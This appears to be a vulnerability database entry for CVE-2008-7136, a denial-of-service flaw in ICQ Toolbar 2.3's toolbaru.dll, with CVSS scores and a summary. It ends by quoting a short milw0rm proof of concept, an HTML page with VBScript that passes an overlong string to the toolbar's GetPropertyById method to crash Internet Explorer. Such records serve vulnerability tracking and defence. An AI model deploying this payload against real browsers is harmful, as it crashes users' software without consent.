4.3
CVSSv2

CVE-2008-7136

Published: 01/09/2009 Updated: 29/09/2017
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P

Vulnerability Summary

toolbaru.dll in ICQ Toolbar (ICQToolbar) 2.3 allows remote malicious users to cause a denial of service (toolbar crash) via a long argument to the (1) RequestURL, (2) GetPropertyById, or (3) SetPropertyById method, different vectors than CVE-2008-7135.

Vulnerable Product Search on Vulmon Subscribe to Product

icq icq toolbar 2.3

Exploits

<!-- Lame ICQToolbar IE DoS - Crash IE and change toolbar color :p --> <html> <object classid='clsid:855F3B16-6D32-4FE6-8A56-BBB695989046' id='toolbar' ></object> <script language='vbscript'> bof=String(128, "spdr") toolbarGetPropertyById "" ,bof </script> </html> # milw0rmcom [2008-03-06] ...